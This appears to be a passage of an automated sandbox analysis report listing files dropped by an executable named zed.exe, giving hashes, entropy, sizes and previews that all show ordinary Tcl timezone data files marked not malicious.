                                                                                                                                                                                                                                            SHA-256:A516BB0937977EF949D47B3C8675E30F1CA6C34F8BD298DCF6EBB943580D5317
                                                                                                                                                                                                                                            SHA-512:8D5FFDB5B578B8EA0291D3A21BDDE25F8301CB16B11AE794FFBA8DCFFE46F6AC5EC03D93E511061B132D84E69E5FAF1BB212837EB8A5A4B4BE517F783837E615
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Catamarca) {.. {-9223372036854775808 -15788 0 LMT}.. {-2372096212 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522740
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):242
                                                                                                                                                                                                                                            Entropy (8bit):4.72138001874583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/290/MquQ90/MMXAy:MByMY/MYp/MrRt290/MquQ90/MK
                                                                                                                                                                                                                                            MD5:8A609667DE461CEDC1127BE38B161459
                                                                                                                                                                                                                                            SHA1:557D2D55DEA38D1CD1103E183F89C65F4016662B
                                                                                                                                                                                                                                            SHA-256:8CCD6FC77D55582938F1912B1BA66035882D1BFC18A797C631E5E89ABFBF570B
                                                                                                                                                                                                                                            SHA-512:DBAFDA069DB5FDBCBA11050AC91A733C1712BD6395939CFFFC5EAA78BD0B70B4AF2D9FB8954C6841CCF3AC5F8EDCF08E604D3F2CF67F1CBEA5EB6D3C4DC7F2FA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2043
                                                                                                                                                                                                                                            Entropy (8bit):3.7481312409221594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5lxQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0n:/xBu3pfe92jCs/VOHv2kdeRtnxafww3j
                                                                                                                                                                                                                                            MD5:8C1D665A25E61CE462C2AC57687763BF
                                                                                                                                                                                                                                            SHA1:B5BBC26CF6A24BD5BEA42AC485D62C789B80905F
                                                                                                                                                                                                                                            SHA-256:FA75E274240A341C6BFE3539CFDC114D125AEAEA3161D3C2409347CF8046042A
                                                                                                                                                                                                                                            SHA-512:A89A7A92C025B87DA4CDFE99BF70CD0E64690D7BFE827DCBFBF0E91B188003FA26487E72B6B950D3BFC9C854B890E5936F414BBEAAD5F3F0673AC5EFE273CDF4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Cordoba) {.. {-9223372036854775808 -15408 0 LMT}.. {-2372096592 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2041
                                                                                                                                                                                                                                            Entropy (8bit):3.7481290145270245
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5HluuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwcSPAC8OS0E:xwu3pfe92jCs/VOHv2kdeRtnxafwcDCK
                                                                                                                                                                                                                                            MD5:995EDE9E1E86DB500C7437A196325E21
                                                                                                                                                                                                                                            SHA1:4A8FB1511AA124CA2D299EC8DE155EE9D0479180
                                                                                                                                                                                                                                            SHA-256:43EB79ABC03CBAC661C563DE1BC09D9DD855CBC72DD2B6467EA98F0F90421BA9
                                                                                                                                                                                                                                            SHA-512:B58B35EA1B2F0388B8108DCF254F3BD1B21894F00A9F313ABC093BC52C36FCDD94B7486DBA38161C9EFCDB12BC3CD81E7E02395B0CA480A7F01148C43CD3054F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Jujuy) {.. {-9223372036854775808 -15672 0 LMT}.. {-2372096328 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2106
                                                                                                                                                                                                                                            Entropy (8bit):3.744252944523733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5lduuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0NC:Tou3pfe92jCs/VOHv2kdeRtnxafwwkFP
                                                                                                                                                                                                                                            MD5:4A45A063D45EB94214005EF3CA5BCD6D
                                                                                                                                                                                                                                            SHA1:2420E8591DC53A39EE1A58B2E45DCFAF9503685F
                                                                                                                                                                                                                                            SHA-256:2B018B791E48269FA9EDA12662FFEC3E2DC33603A918E8B735B8D7D6BEB3B3AA
                                                                                                                                                                                                                                            SHA-512:0B2824FA3D40B2EDBE8488D50C30368F4CF6E45A39FF6DEBC5BB4FD86F85AD52F5331AD1EB50E5166FA2E735B7E8AA9D94A5FED9421334DB0499524DBE08F737
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/La_Rioja) {.. {-9223372036854775808 -16044 0 LMT}.. {-2372095956 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2077
                                                                                                                                                                                                                                            Entropy (8bit):3.738002814507529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5CPBuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwGSmSc8OSI:GUu3pfe92jCs/VOHv2kdeRtnxafwGJld
                                                                                                                                                                                                                                            MD5:F6CB24E8567B2443224E9E17EE438BFE
                                                                                                                                                                                                                                            SHA1:8029426C30C4C645EA77C6240391CDB1C3107568
                                                                                                                                                                                                                                            SHA-256:DC39400BBFD5BDDDC174FE099194806FBFD3FC3AA20E670D67BE0AC35FE97AD4
                                                                                                                                                                                                                                            SHA-512:6869CFC24C21FBB2DFCCAA9AE7E21A0B24DC002EE792FB28A8F2F05C75C20E93C95A39BD8653AA272AF10FE95922B99EECC1208AACE814817D9441F84360E867
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Mendoza) {.. {-9223372036854775808 -16516 0 LMT}.. {-2372095484 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2080
                                                                                                                                                                                                                                            Entropy (8bit):3.7580685839169545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5oQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0NC:qBu3pfe92jCs/VOHv2kdeRtnxafwwfFP
                                                                                                                                                                                                                                            MD5:212D13CE27AF114A8EC2E04023D218C4
                                                                                                                                                                                                                                            SHA1:C4C5F86BC6EC0D5EA4C9CF199309D085767B97E8
                                                                                                                                                                                                                                            SHA-256:A05B6708DEFF0607396BFC6661C2287341C3432841AE353D94A67AC742B5FAFA
                                                                                                                                                                                                                                            SHA-512:CE7201EEA6A86FB49641410D2EEE4030EDB1B96F3218D764762F5AE23883C796F5742ED69CEC985A9D3582D6C72ED74114DE81508F6DEB4B54865B6974ADC965
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Rio_Gallegos) {.. {-9223372036854775808 -16612 0 LMT}.. {-2372095388 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2011
                                                                                                                                                                                                                                            Entropy (8bit):3.7415813345133975
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5NPuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0wF:72u3pfe92jCs/VOHv2kdeRtnxafww3mz
                                                                                                                                                                                                                                            MD5:A06C33CDFD7E7B630CB1DF34E72E61E5
                                                                                                                                                                                                                                            SHA1:694826B9B910DA0BD70A9CB547C26E6838B08111
                                                                                                                                                                                                                                            SHA-256:CAEFC60F2F36EF9FFE0C5921C3C392DE1E95755683A96C1C4EC0BA2C242A4D84
                                                                                                                                                                                                                                            SHA-512:D6696A6C14EECF2B77EC586F40137BDD95E5CE5C5193570C809FAB9E5FCA4B8744283CEB6818E525C73F6EFF657274410B2622902EE8C15912C8D5F5FA5C805E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Salta) {.. {-9223372036854775808 -15700 0 LMT}.. {-2372096300 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2106
                                                                                                                                                                                                                                            Entropy (8bit):3.747934819596411
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5vXxuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0K:hUu3pfe92jCs/VOHv2kdeRtnxafwwkFl
                                                                                                                                                                                                                                            MD5:32A50D0ABF408D9E59C0580D5B8CC472
                                                                                                                                                                                                                                            SHA1:EA5BB8860982F8BAFEAEFDE1D6ACD440DA132DFE
                                                                                                                                                                                                                                            SHA-256:41B2C25E42146A76934B866061BB3245B8ADA0FF4E1BFBA6F8842A30BDD5C132
                                                                                                                                                                                                                                            SHA-512:E5D2521A4EF53AAD3E74506708EC2768C4D2EE8D6D014DCCF4A6DC290B713B4D46021B66527548C35004E10D753E1B685EEFD55BBE7BF01EC6104D7D8AAC4403
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Juan) {.. {-9223372036854775808 -16444 0 LMT}.. {-2372095556 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2081
                                                                                                                                                                                                                                            Entropy (8bit):3.7399269084699975
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5MDuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafw6bS2nZSbdI:yCu3pfe92jCs/VOHv2kdeRtnxafwWnZr
                                                                                                                                                                                                                                            MD5:FB06B66F5D41709C7E85C8B1E9BFCFA0
                                                                                                                                                                                                                                            SHA1:D5C0C4B12C6190856C300321B1C106C7474BA54B
                                                                                                                                                                                                                                            SHA-256:A43B35F25E54EF359D046E33281C0A978F0EE8811C93A6809F1F65750878BBB6
                                                                                                                                                                                                                                            SHA-512:D445F46D6A17A075AD995885E45234A711F53BF3FE2DFC6DFBB611E8AC154B10C91E137927DD66D6A7C596A93BAE5DE283796F341B5095FA0DD05595E1C3A077
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Luis) {.. {-9223372036854775808 -15924 0 LMT}.. {-2372096076 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2105
                                                                                                                                                                                                                                            Entropy (8bit):3.741704529449777
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5yZujuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OSf:suiu3pfe92jCs/VOHv2kdeRtnxafww3w
                                                                                                                                                                                                                                            MD5:D9497141EC0DC172E5FF5304FED0BE6B
                                                                                                                                                                                                                                            SHA1:CD20A4F0C127A84791093010D59DF119DD32340A
                                                                                                                                                                                                                                            SHA-256:0F7DB23E1280FC19A1FB716E09A9699ADA2AAE24084CAD472B4C325CC9783CCF
                                                                                                                                                                                                                                            SHA-512:0B71952055013CD6045ED209FD98168083550655FAB91B7870C92098E40C4FE6827EAAF922D34ECE28298CBB14327A76AD6780D480E552F52F865AA11A4AA083
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2075
                                                                                                                                                                                                                                            Entropy (8bit):3.7445758155279836
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                                                                                                                            MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                                                                                                                            SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                                                                                                                            SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                                                                                                                            SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.893042770292303
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                                                                                                                            MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                                                                                                                            SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                                                                                                                            SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                                                                                                                            SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7944
                                                                                                                                                                                                                                            Entropy (8bit):3.5156463862656775
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                                                                                                                            MD5:181203CAD98E94355B9914A205514904
                                                                                                                                                                                                                                            SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                                                                                                                            SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                                                                                                                            SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.791603790249234
